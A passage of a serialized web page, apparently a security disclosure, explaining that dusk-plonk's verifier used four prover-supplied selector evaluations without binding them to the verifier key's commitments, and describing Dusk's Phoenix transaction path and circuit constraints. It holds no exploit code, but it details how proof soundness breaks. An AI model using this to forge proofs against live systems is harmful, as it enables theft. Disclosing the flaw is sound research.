construction.",{"type":27,"tag":26063,"props":151603,"children":151604},{},[],{"type":27,"tag":28,"props":151606,"children":151608},{"id":151607},"where-dusk-plonk-differs-from-textbook-plonk",[151609],{"type":33,"value":151610},"Where dusk-plonk differs from textbook PLONK",{"type":27,"tag":36,"props":151612,"children":151613},{},[151614,151623,151625,151630,151632,151662],{"type":27,"tag":47,"props":151615,"children":151617},{"href":148489,"rel":151616},[51],[151618],{"type":27,"tag":84,"props":151619,"children":151621},{"className":151620},[],[151622],{"type":33,"value":148493},{"type":33,"value":151624}," is not a literal transcription of the 2019 PLONK paper. It extends the arithmetic gate with a fourth wire ",{"type":27,"tag":84,"props":151626,"children":151628},{"className":151627},[],[151629],{"type":33,"value":77797},{"type":33,"value":151631},", adds custom widgets for range, logic, and elliptic-curve operations, uses shifted evaluations at ",{"type":27,"tag":84,"props":151633,"children":151635},{"className":151634},[11266,11267],[151636],{"type":27,"tag":207,"props":151637,"children":151639},{"className":151638},[11272],[151640],{"type":27,"tag":207,"props":151641,"children":151643},{"className":151642,"ariaHidden":11278},[11277],[151644],{"type":27,"tag":207,"props":151645,"children":151647},{"className":151646},[11283],[151648,151652,151657],{"type":27,"tag":207,"props":151649,"children":151651},{"className":151650,"style":118092},[11288],[],{"type":27,"tag":207,"props":151653,"children":151655},{"className":151654,"style":120808},[11294,28860],[151656],{"type":33,"value":120811},{"type":27,"tag":207,"props":151658,"children":151660},{"className":151659,"style":100750},[11294,28860],[151661],{"type":33,"value":151324},{"type":33,"value":151663},", and heavily batches KZG openings. None of that is exotic by modern PLONK standards, but it does make the verifier harder to reason about than the minimal paper presentation.",{"type":27,"tag":36,"props":151665,"children":151666},{},[151667,151669,151674,151675,151680,151682,151688,151690,151697],{"type":33,"value":151668},"The important part for this bug is the boundary between ",{"type":27,"tag":12606,"props":151670,"children":151671},{},[151672],{"type":33,"value":151673},"public circuit data",{"type":33,"value":1131},{"type":27,"tag":12606,"props":151676,"children":151677},{},[151678],{"type":33,"value":151679},"prover claims about that data at the random challenge point",{"type":33,"value":151681},". Parallel implementations avoid this ambiguity by keeping selector polynomials strictly out of the prover's hands. For example, Consensys' gnark (one of the most widely deployed PLONK implementations) never asks the prover for selector evaluations at all. Instead, the verifier incorporates the selector commitments ",{"type":27,"tag":84,"props":151683,"children":151685},{"className":151684},[],[151686],{"type":33,"value":151687},"Ql, Qr, Qm, Qo, Qk",{"type":33,"value":151689}," directly into the ",{"type":27,"tag":47,"props":151691,"children":151694},{"href":151692,"rel":151693},"https://github.com/Consensys/gnark/blob/17b079f1b813d9dafd465202466b09f282b4c5e9/backend/plonk/bls12-381/verify.go#L253-L270",[51],[151695],{"type":33,"value":151696},"linearization multi-scalar multiplication",{"type":33,"value":151698},", ensuring their values are cryptographically bound by construction.",{"type":27,"tag":36,"props":151700,"children":151701},{},[151702,151704,151729],{"type":33,"value":151703},"Dusk's custom widgets were more complex (multiplying selectors with other evaluated terms), so they could not just use a simple linear combination of commitments. Their architecture required evaluating the selectors at ",{"type":27,"tag":84,"props":151705,"children":151707},{"className":151706},[11266,11267],[151708],{"type":27,"tag":207,"props":151709,"children":151711},{"className":151710},[11272],[151712],{"type":27,"tag":207,"props":151713,"children":151715},{"className":151714,"ariaHidden":11278},[11277],[151716],{"type":27,"tag":207,"props":151717,"children":151719},{"className":151718},[11283],[151720,151724],{"type":27,"tag":207,"props":151721,"children":151723},{"className":151722,"style":118092},[11288],[],{"type":27,"tag":207,"props":151725,"children":151727},{"className":151726,"style":120808},[11294,28860],[151728],{"type":33,"value":120811},{"type":33,"value":151730}," and using those scalars. But while they serialized those four selector evaluations into the proof struct, they never actually verified them against the verifier key's commitments through an opening proof.",{"type":27,"tag":36,"props":151732,"children":151733},{},[151734],{"type":33,"value":151735},"The shortest way to see the bug is the graph below: safe values flow through the opening path toward the final pairing check, while the red selector flow enters verifier logic without ever touching an opening proof.",{"type":27,"tag":151737,"props":151738,"children":151739},"dusk-verifier-dependence-graph",{},[],{"type":27,"tag":26063,"props":151741,"children":151742},{},[],{"type":27,"tag":28,"props":151744,"children":151746},{"id":151745},"how-dusk-uses-plonk",[151747],{"type":33,"value":151748},"How Dusk uses PLONK",{"type":27,"tag":36,"props":151750,"children":151751},{},[151752,151758],{"type":27,"tag":47,"props":151753,"children":151755},{"href":148498,"rel":151754},[51],[151756],{"type":33,"value":151757},"Dusk Network",{"type":33,"value":151759}," is a privacy-focused L1 blockchain. Its transaction model has two modes:",{"type":27,"tag":1228,"props":151761,"children":151762},{},[151763,151768],{"type":27,"tag":1232,"props":151764,"children":151765},{},[151766],{"type":33,"value":151767},"Phoenix (shielded): amounts and participants are hidden using ZK proofs, and every Phoenix transaction carries a PLONK proof that the transaction is valid.",{"type":27,"tag":1232,"props":151769,"children":151770},{},[151771],{"type":33,"value":151772},"Moonlight (transparent): standard account-based transactions verified by BLS signatures, with no PLONK involvement.",{"type":27,"tag":36,"props":151774,"children":151775},{},[151776,151778,151789,151791,151802],{"type":33,"value":151777},"At node level, every ",{"type":27,"tag":47,"props":151779,"children":151782},{"href":151780,"rel":151781},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L152-L185",[51],[151783],{"type":27,"tag":84,"props":151784,"children":151786},{"className":151785},[],[151787],{"type":33,"value":151788},"ProtocolTransaction::Phoenix",{"type":33,"value":151790}," goes through ",{"type":27,"tag":47,"props":151792,"children":151795},{"href":151793,"rel":151794},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/verifier.rs#L71-L82",[51],[151796],{"type":27,"tag":84,"props":151797,"children":151799},{"className":151798},[],[151800],{"type":33,"value":151801},"verify_proof_with_version()",{"type":33,"value":151803}," during preverification. If that PLONK proof verifies, the transaction is admitted to the mempool and can later be mined into a block. Moonlight-path transactions instead go through BLS signature verification.",{"type":27,"tag":36,"props":151805,"children":151806},{},[151807,151809,151820,151822,151833,151834,151845,151846,151857,151858,151869],{"type":33,"value":151808},"That same Phoenix proof path covers more than simple shielded transfers. Phoenix-path staking, reward withdrawals, unstaking, and Phoenix-to-Moonlight conversion all build a Phoenix transaction via ",{"type":27,"tag":47,"props":151810,"children":151813},{"href":151811,"rel":151812},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L54-L95",[51],[151814],{"type":27,"tag":84,"props":151815,"children":151817},{"className":151816},[],[151818],{"type":33,"value":151819},"phoenix()",{"type":33,"value":151821},", for example in ",{"type":27,"tag":47,"props":151823,"children":151826},{"href":151824,"rel":151825},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L144-L186",[51],[151827],{"type":27,"tag":84,"props":151828,"children":151830},{"className":151829},[],[151831],{"type":33,"value":151832},"phoenix_stake()",{"type":33,"value":1123},{"type":27,"tag":47,"props":151835,"children":151838},{"href":151836,"rel":151837},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L240-L298",[51],[151839],{"type":27,"tag":84,"props":151840,"children":151842},{"className":151841},[],[151843],{"type":33,"value":151844},"phoenix_stake_reward()",{"type":33,"value":1123},{"type":27,"tag":47,"props":151847,"children":151850},{"href":151848,"rel":151849},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L358-L416",[51],[151851],{"type":27,"tag":84,"props":151852,"children":151854},{"className":151853},[],[151855],{"type":33,"value":151856},"phoenix_unstake()",{"type":33,"value":4601},{"type":27,"tag":47,"props":151859,"children":151862},{"href":151860,"rel":151861},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/wallet-core/src/transaction.rs#L481-L539",[51],[151863],{"type":27,"tag":84,"props":151864,"children":151866},{"className":151865},[],[151867],{"type":33,"value":151868},"phoenix_to_moonlight()",{"type":33,"value":151870},". So if Phoenix proof verification is unsound, the entire shielded transaction path is exposed.",{"type":27,"tag":36,"props":151872,"children":151873},{},[151874],{"type":27,"tag":126,"props":151875,"children":151878},{"alt":151876,"src":151877},"phoenix_moonlight","/posts/dusk-commitment-issues/phoenix_moonlight.svg",[],{"type":27,"tag":36,"props":151880,"children":151881},{},[151882,151884,151890,151892,151899],{"type":33,"value":151883},"The PLONK implementation, ",{"type":27,"tag":47,"props":151885,"children":151888},{"href":151886,"rel":151887},"https://github.com/dusk-network/plonk",[51],[151889],{"type":33,"value":148493},{"type":33,"value":151891},", is a standalone library by the Dusk team. It was among the first PLONK implementations written, with development starting the same year ",{"type":27,"tag":47,"props":151893,"children":151896},{"href":151894,"rel":151895},"https://eprint.iacr.org/archive/2019/953/1566424053.pdf",[51],[151897],{"type":33,"value":151898},"the original paper",{"type":33,"value":151900}," was released.",{"type":27,"tag":36,"props":151902,"children":151903},{},[151904,151906,151912],{"type":33,"value":151905},"The Phoenix transaction PLONK circuit is defined ",{"type":27,"tag":47,"props":151907,"children":151910},{"href":151908,"rel":151909},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L20-L205",[51],[151911],{"type":33,"value":54826},{"type":33,"value":151913},". The circuit enforces the following set of constraints:",{"type":27,"tag":62980,"props":151915,"children":151916},{},[151917,151933],{"type":27,"tag":130201,"props":151918,"children":151919},{},[151920],{"type":27,"tag":130205,"props":151921,"children":151922},{},[151923,151928],{"type":27,"tag":130209,"props":151924,"children":151925},{},[151926],{"type":33,"value":151927},"Circuit check",{"type":27,"tag":130209,"props":151929,"children":151930},{},[151931],{"type":33,"value":151932},"Statement being checked",{"type":27,"tag":130229,"props":151934,"children":151935},{},[151936,151954,151972,151990,152008,152165,152305,152323],{"type":27,"tag":130205,"props":151937,"children":151938},{},[151939,151949],{"type":27,"tag":130236,"props":151940,"children":151941},{},[151942],{"type":27,"tag":47,"props":151943,"children":151946},{"href":151944,"rel":151945},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L106-L126",[51],[151947],{"type":33,"value":151948},"Merkle tree membership",{"type":27,"tag":130236,"props":151950,"children":151951},{},[151952],{"type":33,"value":151953},"Each input note hash is opened against the public Merkle root, so only notes already in the note tree may be spent",{"type":27,"tag":130205,"props":151955,"children":151956},{},[151957,151967],{"type":27,"tag":130236,"props":151958,"children":151959},{},[151960],{"type":27,"tag":47,"props":151961,"children":151964},{"href":151962,"rel":151963},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L70-L79",[51],[151965],{"type":33,"value":151966},"Input-note secret-key authorization",{"type":27,"tag":130236,"props":151968,"children":151969},{},[151970],{"type":33,"value":151971},"The prover knows the secret key controlling each input note",{"type":27,"tag":130205,"props":151973,"children":151974},{},[151975,151985],{"type":27,"tag":130236,"props":151976,"children":151977},{},[151978],{"type":27,"tag":47,"props":151979,"children":151982},{"href":151980,"rel":151981},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L81-L87",[51],[151983],{"type":33,"value":151984},"Nullifier correctness",{"type":27,"tag":130236,"props":151986,"children":151987},{},[151988],{"type":33,"value":151989},"Each nullifier matches the corresponding note key and position",{"type":27,"tag":130205,"props":151991,"children":151992},{},[151993,152003],{"type":27,"tag":130236,"props":151994,"children":151995},{},[151996],{"type":27,"tag":47,"props":151997,"children":152000},{"href":151998,"rel":151999},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L149-L160",[51],[152001],{"type":33,"value":152002},"Output value commitment correctness",{"type":27,"tag":130236,"props":152004,"children":152005},{},[152006],{"type":33,"value":152007},"Each public output commitment matches the secret output value and blinder",{"type":27,"tag":130205,"props":152009,"children":152010},{},[152011,152021],{"type":27,"tag":130236,"props":152012,"children":152013},{},[152014],{"type":27,"tag":47,"props":152015,"children":152018},{"href":152016,"rel":152017},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L167-L178",[51],[152019],{"type":33,"value":152020},"Balance integrity",{"type":27,"tag":130236,"props":152022,"children":152023},{},[152024],{"type":27,"tag":84,"props":152025,"children":152027},{"className":152026},[11266,11267],[152028],{"type":27,"tag":207,"props":152029,"children":152031},{"className":152030},[11272],[152032],{"type":27,"tag":207,"props":152033,"children":152035},{"className":152034,"ariaHidden":11278},[11277],[152036,152076,152116,152148],{"type":27,"tag":207,"props":152037,"children":152039},{"className":152038},[11283],[152040,152044,152049,152053,152063,152067,152072],{"type":27,"tag":207,"props":152041,"children":152043},{"className":152042,"style":11393},[11288],[],{"type":27,"tag":207,"props":152045,"children":152047},{"className":152046,"style":28903},[28896,28901,28902],[152048],{"type":33,"value":116046},{"type":27,"tag":207,"props":152050,"children":152052},{"className":152051,"style":11411},[11372],[],{"type":27,"tag":207,"props":152054,"children":152056},{"className":152055},[11294,33],[152057],{"type":27,"tag":207,"props":152058,"children":152060},{"className":152059},[11294],[152061],{"type":33,"value":152062},"inputs",{"type":27,"tag":207,"props":152064,"children":152066},{"className":152065,"style":11470},[11372],[],{"type":27,"tag":207,"props":152068,"children":152070},{"className":152069},[11475],[152071],{"type":33,"value":10380},{"type":27,"tag":207,"props":152073,"children":152075},{"className":152074,"style":11470},[11372],[],{"type":27,"tag":207,"props":152077,"children":152079},{"className":152078},[11283],[152080,152084,152089,152093,152103,152107,152112],{"type":27,"tag":207,"props":152081,"children":152083},{"className":152082,"style":11393},[11288],[],{"type":27,"tag":207,"props":152085,"children":152087},{"className":152086,"style":28903},[28896,28901,28902],[152088],{"type":33,"value":116046},{"type":27,"tag":207,"props":152090,"children":152092},{"className":152091,"style":11411},[11372],[],{"type":27,"tag":207,"props":152094,"children":152096},{"className":152095},[11294,33],[152097],{"type":27,"tag":207,"props":152098,"children":152100},{"className":152099},[11294],[152101],{"type":33,"value":152102},"outputs",{"type":27,"tag":207,"props":152104,"children":152106},{"className":152105,"style":11373},[11372],[],{"type":27,"tag":207,"props":152108,"children":152110},{"className":152109},[11378],[152111],{"type":33,"value":2227},{"type":27,"tag":207,"props":152113,"children":152115},{"className":152114,"style":11373},[11372],[],{"type":27,"tag":207,"props":152117,"children":152119},{"className":152118},[11283],[152120,152125,152135,152139,152144],{"type":27,"tag":207,"props":152121,"children":152124},{"className":152122,"style":152123},[11288],"height:0.7778em;vertical-align:-0.0833em;",[],{"type":27,"tag":207,"props":152126,"children":152128},{"className":152127},[11294,33],[152129],{"type":27,"tag":207,"props":152130,"children":152132},{"className":152131},[11294],[152133],{"type":33,"value":152134},"fee",{"type":27,"tag":207,"props":152136,"children":152138},{"className":152137,"style":11373},[11372],[],{"type":27,"tag":207,"props":152140,"children":152142},{"className":152141},[11378],[152143],{"type":33,"value":2227},{"type":27,"tag":207,"props":152145,"children":152147},{"className":152146,"style":11373},[11372],[],{"type":27,"tag":207,"props":152149,"children":152151},{"className":152150},[11283],[152152,152156],{"type":27,"tag":207,"props":152153,"children":152155},{"className":152154,"style":122305},[11288],[],{"type":27,"tag":207,"props":152157,"children":152159},{"className":152158},[11294,33],[152160],{"type":27,"tag":207,"props":152161,"children":152163},{"className":152162},[11294],[152164],{"type":33,"value":69195},{"type":27,"tag":130205,"props":152166,"children":152167},{},[152168,152185],{"type":27,"tag":130236,"props":152169,"children":152170},{},[152171,152178,152179],{"type":27,"tag":47,"props":152172,"children":152175},{"href":152173,"rel":152174},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L89-L90",[51],[152176],{"type":33,"value":152177},"Range checks on inputs",{"type":33,"value":1131},{"type":27,"tag":47,"props":152180,"children":152183},{"href":152181,"rel":152182},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/circuit_impl.rs#L141-L142",[51],[152184],{"type":33,"value":152102},{"type":27,"tag":130236,"props":152186,"children":152187},{},[152188,152190],{"type":33,"value":152189},"All note values lie in ",{"type":27,"tag":84,"props":152191,"children":152193},{"className":152192},[11266,11267],[152194],{"type":27,"tag":207,"props":152195,"children":152197},{"className":152196},[11272],[152198],{"type":27,"tag":207,"props":152199,"children":152201},{"className":152200,"ariaHidden":11278},[11277],[152202,152287],{"type":27,"tag":207,"props":152203,"children":152205},{"className":152204},[11283],[152206,152210,152215,152220,152225,152229,152274,152278,152283],{"type":27,"tag":207,"props":152207,"children":152209},{"className":152208,"style":122562},[11288],[],{"type":27,"tag":207,"props":152211,"children":152213},{"className":152212},[28989],[152214],{"type":33,"value":11019},{"type":27,"tag":207,"props":152216,"children":152218},{"className":152217},[11294],[152219],{"type":33,"value":1660},{"type":27,"tag":207,"props":152221,"children":152223},{"className":152222},[11404],[152224],{"type":33,"value":11407},{"type":27,"tag":207,"props":152226,"children":152228},{"className":152227,"style":11411},[11372],[],{"type":27,"tag":207,"props":152230,"children":152232},{"className":152231},[11294],[152233,152238],{"type":27,"tag":207,"props":152234,"children":152236},{"className":152235},[11294],[152237],{"type":33,"value":1744},{"type":27,"tag":207,"props":152239,"children":152241},{"className":152240},[11309],[152242],{"type":27,"tag":207,"props":152243,"children":152245},{"className":152244},[11314],[152246],{"type":27,"tag":207,"props":152247,"children":152249},{"className":152248},[11319],[152250],{"type":27,"tag":207,"props":152251,"children":152253},{"className":152252,"style":11289},[11324],[152254],{"type":27,"tag":207,"props":152255,"children":152256},{"style":11328},[152257,152261],{"type":27,"tag":207,"props":152258,"children":152260},{"className":152259,"style":11334},[11333],[],{"type":27,"tag":207,"props":152262,"children":152264},{"className":152263},[11339,11340,11341,11342],[152265],{"type":27,"tag":207,"props":152266,"children":152268},{"className":152267},[11294,11342],[152269],{"type":27,"tag":207,"props":152270,"children":152272},{"className":152271},[11294,11342],[152273],{"type":33,"value":2889},{"type":27,"tag":207,"props":152275,"children":152277},{"className":152276,"style":11373},[11372],[],{"type":27,"tag":207,"props":152279,"children":152281},{"className":152280},[11378],[152282],{"type":33,"value":11353},{"type":27,"tag":207,"props":152284,"children":152286},{"className":152285,"style":11373},[11372],[],{"type":27,"tag":207,"props":152288,"children":152290},{"className":152289},[11283],[152291,152295,152300],{"type":27,"tag":207,"props":152292,"children":152294},{"className":152293,"style":11393},[11288],[],{"type":27,"tag":207,"props":152296,"children":152298},{"className":152297},[11294],[152299],{"type":33,"value":1651},{"type":27,"tag":207,"props":152301,"children":152303},{"className":152302},[29011],[152304],{"type":33,"value":22686},{"type":27,"tag":130205,"props":152306,"children":152307},{},[152308,152318],{"type":27,"tag":130236,"props":152309,"children":152310},{},[152311],{"type":27,"tag":47,"props":152312,"children":152315},{"href":152313,"rel":152314},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L28-L51",[51],[152316],{"type":33,"value":152317},"Sender-authorship signatures",{"type":27,"tag":130236,"props":152319,"children":152320},{},[152321],{"type":33,"value":152322},"The transaction payload is signed by the sender's two signing key components",{"type":27,"tag":130205,"props":152324,"children":152325},{},[152326,152336],{"type":27,"tag":130236,"props":152327,"children":152328},{},[152329],{"type":27,"tag":47,"props":152330,"children":152333},{"href":152331,"rel":152332},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L63-L121",[51],[152334],{"type":33,"value":152335},"Sender encryption correctness",{"type":27,"tag":130236,"props":152337,"children":152338},{},[152339],{"type":33,"value":152340},"The sender data attached to each output note is a correct ElGamal encryption under the recipient note key",{"type":27,"tag":36,"props":152342,"children":152343},{},[152344,152346,152352,152354,152363],{"type":33,"value":152345},"Rusk does not consume these claims one by one. It consumes a single valid/invalid proof verdict over ",{"type":27,"tag":84,"props":152347,"children":152349},{"className":152348},[],[152350],{"type":33,"value":152351},"tx.public_inputs()",{"type":33,"value":152353}," via ",{"type":27,"tag":47,"props":152355,"children":152357},{"href":151793,"rel":152356},[51],[152358],{"type":27,"tag":84,"props":152359,"children":152361},{"className":152360},[],[152362],{"type":33,"value":151801},{"type":33,"value":1041},{"type":27,"tag":36,"props":152365,"children":152366},{},[152367],{"type":33,"value":152368},"A soundness break in PLONK voids all of these constraints simultaneously, because forged selector evaluations make the entire circuit unconstrained rather than targeting any single check.",{"type":27,"tag":26063,"props":152370,"children":152371},{},[],{"type":27,"tag":28,"props":152373,"children":152374},{"id":97519},[152375],{"type":33,"value":152376},"The bug",{"type":27,"tag":36,"props":152378,"children":152379},{},[152380,152382,152389,152391,152402],{"type":33,"value":152381},"In the ",{"type":27,"tag":47,"props":152383,"children":152386},{"href":152384,"rel":152385},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L400",[51],[152387],{"type":33,"value":152388},"PLONK verification",{"type":33,"value":152390},", the verifier batches polynomial evaluations into a single KZG opening proof check. The evaluations included in this batch (committed via ",{"type":27,"tag":47,"props":152392,"children":152395},{"href":152393,"rel":152394},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L373",[51],[152396],{"type":27,"tag":84,"props":152397,"children":152399},{"className":152398},[],[152400],{"type":33,"value":152401},"E_evals",{"type":33,"value":152403},") are:",{"type":27,"tag":1228,"props":152405,"children":152406},{},[152407,152439,152464,152489],{"type":27,"tag":1232,"props":152408,"children":152409},{},[152410,152416,152417,152423,152424,152430,152431,152437],{"type":27,"tag":84,"props":152411,"children":152413},{"className":152412},[],[152414],{"type":33,"value":152415},"a_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152418,"children":152420},{"className":152419},[],[152421],{"type":33,"value":152422},"b_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152425,"children":152427},{"className":152426},[],[152428],{"type":33,"value":152429},"c_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152432,"children":152434},{"className":152433},[],[152435],{"type":33,"value":152436},"d_eval",{"type":33,"value":152438}," (witness)",{"type":27,"tag":1232,"props":152440,"children":152441},{},[152442,152448,152449,152455,152456,152462],{"type":27,"tag":84,"props":152443,"children":152445},{"className":152444},[],[152446],{"type":33,"value":152447},"s_sigma_1_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152450,"children":152452},{"className":152451},[],[152453],{"type":33,"value":152454},"s_sigma_2_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152457,"children":152459},{"className":152458},[],[152460],{"type":33,"value":152461},"s_sigma_3_eval",{"type":33,"value":152463}," (permutation)",{"type":27,"tag":1232,"props":152465,"children":152466},{},[152467,152473,152474,152480,152481,152487],{"type":27,"tag":84,"props":152468,"children":152470},{"className":152469},[],[152471],{"type":33,"value":152472},"a_w_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152475,"children":152477},{"className":152476},[],[152478],{"type":33,"value":152479},"b_w_eval",{"type":33,"value":1123},{"type":27,"tag":84,"props":152482,"children":152484},{"className":152483},[],[152485],{"type":33,"value":152486},"d_w_eval",{"type":33,"value":152488}," (shifted witness)",{"type":27,"tag":1232,"props":152490,"children":152491},{},[152492,152498],{"type":27,"tag":84,"props":152493,"children":152495},{"className":152494},[],[152496],{"type":33,"value":152497},"z_eval",{"type":33,"value":152499}," (permutation accumulator)",{"type":27,"tag":36,"props":152501,"children":152502},{},[152503,152505,152509],{"type":33,"value":152504},"But the following selector evaluations were ",{"type":27,"tag":942,"props":152506,"children":152507},{},[152508],{"type":33,"value":25759},{"type":33,"value":152510}," included:",{"type":27,"tag":1228,"props":152512,"children":152513},{},[152514,152525,152536,152547],{"type":27,"tag":1232,"props":152515,"children":152516},{},[152517,152523],{"type":27,"tag":84,"props":152518,"children":152520},{"className":152519},[],[152521],{"type":33,"value":152522},"q_arith_eval",{"type":33,"value":152524}," (arithmetic selector)",{"type":27,"tag":1232,"props":152526,"children":152527},{},[152528,152534],{"type":27,"tag":84,"props":152529,"children":152531},{"className":152530},[],[152532],{"type":33,"value":152533},"q_c_eval",{"type":33,"value":152535}," (constant selector)",{"type":27,"tag":1232,"props":152537,"children":152538},{},[152539,152545],{"type":27,"tag":84,"props":152540,"children":152542},{"className":152541},[],[152543],{"type":33,"value":152544},"q_l_eval",{"type":33,"value":152546}," (left selector)",{"type":27,"tag":1232,"props":152548,"children":152549},{},[152550,152556],{"type":27,"tag":84,"props":152551,"children":152553},{"className":152552},[],[152554],{"type":33,"value":152555},"q_r_eval",{"type":33,"value":152557}," (right selector)",{"type":27,"tag":36,"props":152559,"children":152560},{},[152561,152563,152570,152571,152578,152579,152586,152587,152594],{"type":33,"value":152562},"The prover places four selector evaluations in the proof struct. The verifier absorbs them into the transcript, and the widget verifier code uses them directly in the linearization check (",{"type":27,"tag":47,"props":152564,"children":152567},{"href":152565,"rel":152566},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/linearization_poly.rs#L33-L83",[51],[152568],{"type":33,"value":152569},"proof struct",{"type":33,"value":1123},{"type":27,"tag":47,"props":152572,"children":152575},{"href":152573,"rel":152574},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L255-L286",[51],[152576],{"type":33,"value":152577},"transcript absorption",{"type":33,"value":1123},{"type":27,"tag":47,"props":152580,"children":152583},{"href":152581,"rel":152582},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/arithmetic/verifierkey.rs#L92-L118",[51],[152584],{"type":33,"value":152585},"arithmetic widget",{"type":33,"value":1123},{"type":27,"tag":47,"props":152588,"children":152591},{"href":152589,"rel":152590},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/ecc/scalar_mul/fixed_base/verifierkey.rs#L46-L102",[51],[152592],{"type":33,"value":152593},"fixed-base ECC widget",{"type":33,"value":152595},"). But they are never checked against the corresponding selector commitments in the verifier key, even though those commitments already exist. The prover sends whatever values it wants and the verifier trusts them.",{"type":27,"tag":36,"props":152597,"children":152598},{},[152599,152601,152605],{"type":33,"value":152600},"The easiest way to see why these four omissions are special is to contrast them with two nearby cases that are ",{"type":27,"tag":942,"props":152602,"children":152603},{},[152604],{"type":33,"value":25759},{"type":33,"value":152606}," bugs:",{"type":27,"tag":1228,"props":152608,"children":152609},{},[152610,152750],{"type":27,"tag":1232,"props":152611,"children":152612},{},[152613,152615,152660,152662,152668,152670,152675,152676,152681,152682,152687,152689,152695,152697,152742,152744,152749],{"type":33,"value":152614},"There is no prover-supplied ",{"type":27,"tag":84,"props":152616,"children":152618},{"className":152617},[11266,11267],[152619],{"type":27,"tag":207,"props":152620,"children":152622},{"className":152621},[11272],[152623],{"type":27,"tag":207,"props":152624,"children":152626},{"className":152625,"ariaHidden":11278},[11277],[152627],{"type":27,"tag":207,"props":152628,"children":152630},{"className":152629},[11283],[152631,152635,152640,152645,152650,152655],{"type":27,"tag":207,"props":152632,"children":152634},{"className":152633,"style":11393},[11288],[],{"type":27,"tag":207,"props":152636,"children":152638},{"className":152637},[11294,28860],[152639],{"type":33,"value":10435},{"type":27,"tag":207,"props":152641,"children":152643},{"className":152642},[28989],[152644],{"type":33,"value":1343},{"type":27,"tag":207,"props":152646,"children":152648},{"className":152647,"style":120808},[11294,28860],[152649],{"type":33,"value":120811},{"type":27,"tag":207,"props":152651,"children":152653},{"className":152652,"style":100750},[11294,28860],[152654],{"type":33,"value":151324},{"type":27,"tag":207,"props":152656,"children":152658},{"className":152657},[29011],[152659],{"type":33,"value":10416},{"type":33,"value":152661}," field at all. ",{"type":27,"tag":84,"props":152663,"children":152665},{"className":152664},[],[152666],{"type":33,"value":152667},"ProofEvaluations",{"type":33,"value":152669}," contains ",{"type":27,"tag":84,"props":152671,"children":152673},{"className":152672},[],[152674],{"type":33,"value":152472},{"type":33,"value":1123},{"type":27,"tag":84,"props":152677,"children":152679},{"className":152678},[],[152680],{"type":33,"value":152479},{"type":33,"value":4601},{"type":27,"tag":84,"props":152683,"children":152685},{"className":152684},[],[152686],{"type":33,"value":152486},{"type":33,"value":152688},", but no ",{"type":27,"tag":84,"props":152690,"children":152692},{"className":152691},[],[152693],{"type":33,"value":152694},"c_w_eval",{"type":33,"value":152696},", so the verifier never consumes an unbound ",{"type":27,"tag":84,"props":152698,"children":152700},{"className":152699},[11266,11267],[152701],{"type":27,"tag":207,"props":152702,"children":152704},{"className":152703},[11272],[152705],{"type":27,"tag":207,"props":152706,"children":152708},{"className":152707,"ariaHidden":11278},[11277],[152709],{"type":27,"tag":207,"props":152710,"children":152712},{"className":152711},[11283],[152713,152717,152722,152727,152732,152737],{"type":27,"tag":207,"props":152714,"children":152716},{"className":152715,"style":11393},[11288],[],{"type":27,"tag":207,"props":152718,"children":152720},{"className":152719},[11294,28860],[152721],{"type":33,"value":10435},{"type":27,"tag":207,"props":152723,"children":152725},{"className":152724},[28989],[152726],{"type":33,"value":1343},{"type":27,"tag":207,"props":152728,"children":152730},{"className":152729,"style":120808},[11294,28860],[152731],{"type":33,"value":120811},{"type":27,"tag":207,"props":152733,"children":152735},{"className":152734,"style":100750},[11294,28860],[152736],{"type":33,"value":151324},{"type":27,"tag":207,"props":152738,"children":152740},{"className":152739},[29011],[152741],{"type":33,"value":10416},{"type":33,"value":152743}," claim 